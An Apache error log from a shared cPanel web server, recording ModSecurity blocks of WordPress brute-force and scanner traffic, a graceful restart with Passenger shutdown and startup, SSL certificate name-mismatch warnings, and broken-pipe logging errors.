[Tue May 26 18:35:37.946952 2026] [security2:error] [pid 1007701:tid 1007904] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWang05qHzKMxj0enGl0AAAAM4"]
[Tue May 26 18:35:37.973883 2026] [security2:error] [pid 1007701:tid 1007838] [client 68.183.88.172:57040] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "jhonweb.com"] [uri "/"] [unique_id "ahWaoQ05qHzKMxj0enGl_QAAAIw"]
[Tue May 26 18:35:38.329879 2026] [security2:error] [pid 1007701:tid 1007733] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWaog05qHzKMxj0enGl_wAAiB8"]
[Tue May 26 18:35:38.330110 2026] [security2:error] [pid 1007701:tid 1007834] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWaog05qHzKMxj0enGl_wAAiB8"]
[Tue May 26 18:35:39.288517 2026] [security2:error] [pid 1007701:tid 1007930] [client 66.249.66.205:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.nicmaperu.com"] [uri "/index.php"] [unique_id "ahWaoA05qHzKMxj0enGl7AAAAOg"]
[Tue May 26 18:35:40.702131 2026] [security2:error] [pid 1007701:tid 1007951] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaoQ05qHzKMxj0enGl-AAAAP0"]
[Tue May 26 18:35:40.810186 2026] [mpm_event:notice] [pid 333123:tid 333123] AH00493: SIGUSR1 received.  Doing graceful restart

[ N 2026-05-26 18:35:40.8276 851595/T8 age/Cor/CoreMain.cpp:671 ]: Signal received. Gracefully shutting down... (send signal 2 more time(s) to force shutdown)
[ N 2026-05-26 18:35:40.8277 851595/T1 age/Cor/CoreMain.cpp:1246 ]: Received command to shutdown gracefully. Waiting until all clients have disconnected...
[ N 2026-05-26 18:35:40.8277 851595/T8 Ser/Server.h:902 ]: [ServerThr.1] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8277 851595/T8 Ser/Server.h:558 ]: [ServerThr.1] Shutdown finished
[ N 2026-05-26 18:35:40.8278 851595/Tg Ser/Server.h:902 ]: [ServerThr.5] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8278 851595/Tc Ser/Server.h:902 ]: [ServerThr.3] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8278 851595/Tg Ser/Server.h:558 ]: [ServerThr.5] Shutdown finished
[ N 2026-05-26 18:35:40.8278 851595/Te Ser/Server.h:902 ]: [ServerThr.4] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8278 851595/Tc Ser/Server.h:558 ]: [ServerThr.3] Shutdown finished
[ N 2026-05-26 18:35:40.8278 851595/Te Ser/Server.h:558 ]: [ServerThr.4] Shutdown finished
[ N 2026-05-26 18:35:40.8278 851595/Ti Ser/Server.h:902 ]: [ServerThr.6] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8278 851595/Ti Ser/Server.h:558 ]: [ServerThr.6] Shutdown finished
[ N 2026-05-26 18:35:40.8278 851595/To Ser/Server.h:902 ]: [ServerThr.9] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8278 851595/To Ser/Server.h:558 ]: [ServerThr.9] Shutdown finished
[ N 2026-05-26 18:35:40.8278 851595/T10 Ser/Server.h:902 ]: [ServerThr.15] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8278 851595/Tv Ser/Server.h:902 ]: [ServerThr.12] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8278 851595/Tq Ser/Server.h:902 ]: [ServerThr.10] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8278 851595/Tb Ser/Server.h:902 ]: [ServerThr.2] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8278 851595/T10 Ser/Server.h:558 ]: [ServerThr.15] Shutdown finished
[ N 2026-05-26 18:35:40.8278 851595/Tv Ser/Server.h:558 ]: [ServerThr.12] Shutdown finished
[ N 2026-05-26 18:35:40.8279 851595/Tq Ser/Server.h:558 ]: [ServerThr.10] Shutdown finished
[ N 2026-05-26 18:35:40.8279 851595/Tb Ser/Server.h:558 ]: [ServerThr.2] Shutdown finished
[ N 2026-05-26 18:35:40.8279 851595/Ty Ser/Server.h:902 ]: [ServerThr.14] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8279 851595/Ty Ser/Server.h:558 ]: [ServerThr.14] Shutdown finished
[ N 2026-05-26 18:35:40.8279 851595/Tt Ser/Server.h:902 ]: [ServerThr.11] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8279 851595/Tt Ser/Server.h:558 ]: [ServerThr.11] Shutdown finished
[ N 2026-05-26 18:35:40.8279 851595/Tm Ser/Server.h:902 ]: [ServerThr.8] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8279 851595/Tm Ser/Server.h:558 ]: [ServerThr.8] Shutdown finished
[ N 2026-05-26 18:35:40.8278 851595/Tk Ser/Server.h:902 ]: [ServerThr.7] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8279 851595/Tw Ser/Server.h:902 ]: [ServerThr.13] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8279 851595/Tk Ser/Server.h:558 ]: [ServerThr.7] Shutdown finished
[ N 2026-05-26 18:35:40.8279 851595/Tw Ser/Server.h:558 ]: [ServerThr.13] Shutdown finished
[ N 2026-05-26 18:35:40.8279 851595/T14 Ser/Server.h:902 ]: [ApiServer] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8280 851595/T14 Ser/Server.h:558 ]: [ApiServer] Shutdown finished
[ N 2026-05-26 18:35:40.8278 851595/T12 Ser/Server.h:902 ]: [ServerThr.16] Freed 0 spare client objects
[ N 2026-05-26 18:35:40.8280 851595/T12 Ser/Server.h:558 ]: [ServerThr.16] Shutdown finished
[ N 2026-05-26 18:35:41.6940 851595/T1 age/Cor/CoreMain.cpp:1325 ]: Passenger core shutdown finished
[Tue May 26 18:35:41.858401 2026] [:notice] [pid 851587:tid 851587] [host root@md-74.webhostbox.net] mod_lsapi:  Selfstarter 851587 stopped
[Tue May 26 18:35:44.139134 2026] [lsapi:notice] [pid 333123:tid 333123] mod_lsapi:  version 1.1-92
[Tue May 26 18:35:44.140462 2026] [:notice] [pid 1015422:tid 1015422] [host root@md-74.webhostbox.net] mod_lsapi:  Selfstarter 1015422 started
[Tue May 26 18:35:44.157665 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: earthone.me.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.169677 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: arborvitae.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.170260 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: cargo-pulse.info.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.178263 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: vobre.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.190016 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dezkapro.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.190317 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: bld4u.mx.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.190660 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: eco-green.com.mx.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.193866 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ntgpnk.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.194195 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: 1earth.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.194772 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: wildcatc.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.195039 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ntgpnk.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.195590 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: parjanya.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.195904 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: canopykaapi.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.196207 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: canopycoffee.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.196477 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: aarinienergy.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.197105 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: hassantourism.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.197388 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: rohiniventures.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.197804 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: adishankara.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.198415 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: actindiamovement.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.200552 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.200871 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: directi.con:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.201126 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: carpetlive.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.202045 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.221863 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: kingsclubbanquet.com.kingsclub.in:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.222215 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: kingsclubmembership.com.kingsclub.in:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.226758 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: rbi-cin.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.227615 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: jbrainit.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.227951 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: phpridles.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.228832 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: updates9ja.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.229183 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: lookqueenny.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.229520 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: 9jareporter.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.229826 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: joshchibuzor.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.230482 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: chyamsempire.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.230851 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: builderscorner.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.231192 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: industrialvacumunit.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.231518 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: chukwuebukafreestyle.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.231908 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ecolinksglobalexpressdelivery.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.232267 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: cwh.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.232609 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: senoro.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.232968 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: crystalclear.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.233284 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: theorestaurante.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.233583 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: garciagutierrez.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.233892 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: theorestaurantecom.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.234195 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: autopartesenguadalajara.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.235886 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dprassurance.lk.dpr.lk:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.239334 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: thriveswift.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.240004 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: gauravchhabradigital.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.243158 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: garciaitconsultores.com.bandita-data.net:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.251736 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: mtm117.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.252115 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: makwasi.com.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.252699 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: baka-bau.com.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.253129 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: alpha-bau.net.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.253551 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: t9-security.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.253925 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: north-connect.de.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.263764 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: pdrwebsolutions.cloud:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.274287 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dpr.lk:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.280289 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: myigfollowers.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.293547 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: localhost:8443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 18:35:44.299001 2026] [qos:notice] [pid 333123:tid 333123] mod_qos(007): calculated MaxClients/MaxRequestWorkers (max connections): 6144, applied limit: 2048 (QS_MaxClients)
[Tue May 26 18:35:44.353894 2026] [log_config:warn] [pid 998632:tid 998798] (32)Broken pipe: [client 103.211.17.252:38374] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://samayikprasanga.in/epaper.php?pn=6
[Tue May 26 18:35:44.353915 2026] [log_config:warn] [pid 998632:tid 998798] (32)Broken pipe: [client 103.211.17.252:38374] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://samayikprasanga.in/epaper.php?pn=6
[Tue May 26 18:35:44.374847 2026] [http2:info] [pid 333123:tid 333123] AH03090: mod_http2 (v2.0.39, feats=CHPRIO+SHA256+INVHD+DWINS, nghttp2 1.69.0), initializing...
[ N 2026-05-26 18:35:44.4012 1015427/T1 age/Wat/WatchdogMain.cpp:1377 ]: Starting Passenger watchdog...
[ N 2026-05-26 18:35:44.4131 1015430/T1 age/Cor/CoreMain.cpp:1340 ]: Starting Passenger core...
[ N 2026-05-26 18:35:44.4132 1015430/T1 age/Cor/CoreMain.cpp:256 ]: Passenger core running in multi-application mode.
[ N 2026-05-26 18:35:44.4335 1015430/T1 age/Cor/CoreMain.cpp:1015 ]: Passenger core online, PID 1015430
[Tue May 26 18:35:44.436174 2026] [mpm_event:notice] [pid 333123:tid 333123] AH00489: Apache/2.4.67 (cPanel) OpenSSL/1.1.1w Apache mod_qos/11.76 mod_bwlimited/1.4 mod_fcgid/2.3.9 Phusion_Passenger/6.0.20 mod_rbld2.0 configured -- resuming normal operations
[Tue May 26 18:35:44.436194 2026] [core:notice] [pid 333123:tid 333123] AH00094: Command line: '/usr/sbin/httpd'
[Tue May 26 18:35:44.684800 2026] [log_config:warn] [pid 998632:tid 998823] (32)Broken pipe: [client 117.99.212.221:35170] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://samayikprasanga.in/epaper.php?pn=3
[Tue May 26 18:35:44.684818 2026] [log_config:warn] [pid 998632:tid 998823] (32)Broken pipe: [client 117.99.212.221:35170] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://samayikprasanga.in/epaper.php?pn=3
[Tue May 26 18:35:45.455579 2026] [http2:info] [pid 1015481:tid 1015481] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 18:35:45.523936 2026] [log_config:warn] [pid 998632:tid 998810] (32)Broken pipe: [client 106.202.41.91:52530] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://samayikprasanga.in/epaper.php
[Tue May 26 18:35:45.523957 2026] [log_config:warn] [pid 998632:tid 998810] (32)Broken pipe: [client 106.202.41.91:52530] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://samayikprasanga.in/epaper.php
[Tue May 26 18:35:45.648318 2026] [log_config:warn] [pid 1007701:tid 1007938] (32)Broken pipe: [client 14.191.124.71:24970] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log, referer: https://www.cagmedya.com/?p=10954
[Tue May 26 18:35:45.648336 2026] [log_config:warn] [pid 1007701:tid 1007938] (32)Broken pipe: [client 14.191.124.71:24970] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log, referer: https://www.cagmedya.com/?p=10954
[Tue May 26 18:35:46.200918 2026] [security2:error] [pid 1015481:tid 1015617] [client 124.43.5.103:19045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaqrQIKfWDMlp2INc58wAAARA"]
[Tue May 26 18:35:46.201153 2026] [security2:error] [pid 1015481:tid 1015617] [client 124.43.5.103:19045] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaqrQIKfWDMlp2INc58wAAARA"]
[Tue May 26 18:35:46.479982 2026] [security2:error] [pid 1015481:tid 1015604] [remote 216.73.216.30:29409] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWaqrQIKfWDMlp2INc6BgABano"]
[Tue May 26 18:35:47.694537 2026] [security2:error] [pid 1015481:tid 1015675] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaqrQIKfWDMlp2INc59gAAAUo"]
[Tue May 26 18:35:47.711070 2026] [security2:error] [pid 1015481:tid 1015652] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaqbQIKfWDMlp2INc57gAAATM"]
[Tue May 26 18:35:47.712076 2026] [security2:error] [pid 1015481:tid 1015648] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaqbQIKfWDMlp2INc56wAAAS8"]
[Tue May 26 18:35:48.871580 2026] [security2:error] [pid 1015481:tid 1015489] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWarLQIKfWDMlp2INc6KwABFQc"]
[Tue May 26 18:35:48.871808 2026] [security2:error] [pid 1015481:tid 1015622] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWarLQIKfWDMlp2INc6KwABFQc"]
[Tue May 26 18:35:48.905451 2026] [security2:error] [pid 1015481:tid 1015629] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWarLQIKfWDMlp2INc6KgAAARw"]
[Tue May 26 18:35:49.431922 2026] [security2:error] [pid 1015481:tid 1015643] [client 49.13.164.148:13874] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWarLQIKfWDMlp2INc6LAAAASo"], referer: https://thegoodsporting.com
[Tue May 26 18:35:49.867361 2026] [log_config:warn] [pid 1007701:tid 1007951] (32)Broken pipe: [client 152.59.148.180:48754] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --suffix=-bytes_log
[Tue May 26 18:35:49.867384 2026] [log_config:warn] [pid 1007701:tid 1007951] (32)Broken pipe: [client 152.59.148.180:48754] AH00646: Error writing to |/usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=md-74.webhostbox.net --mainout=/etc/apache2/logs/access_log
[Tue May 26 18:35:51.742986 2026] [security2:error] [pid 1015481:tid 1015501] [remote 216.73.216.30:7713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWar7QIKfWDMlp2INc6WwABDRM"]
[Tue May 26 18:35:51.976208 2026] [security2:error] [pid 1015481:tid 1015675] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWar7QIKfWDMlp2INc6UgAAAUo"]
[Tue May 26 18:35:54.037691 2026] [security2:error] [pid 1015481:tid 1015688] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWasbQIKfWDMlp2INc6hAAAAVc"]
[Tue May 26 18:35:54.176366 2026] [security2:error] [pid 1015481:tid 1015705] [client 124.43.5.103:21007] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWasrQIKfWDMlp2INc6jgAAAWg"]
[Tue May 26 18:35:54.176571 2026] [security2:error] [pid 1015481:tid 1015705] [client 124.43.5.103:21007] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWasrQIKfWDMlp2INc6jgAAAWg"]
[Tue May 26 18:35:55.480940 2026] [security2:error] [pid 1015481:tid 1015511] [remote 209.42.20.53:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWas7QIKfWDMlp2INc63QABbh0"]
[Tue May 26 18:35:55.874456 2026] [security2:error] [pid 1015481:tid 1015712] [client 76.34.246.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWas7QIKfWDMlp2INc64gAAAW8"]
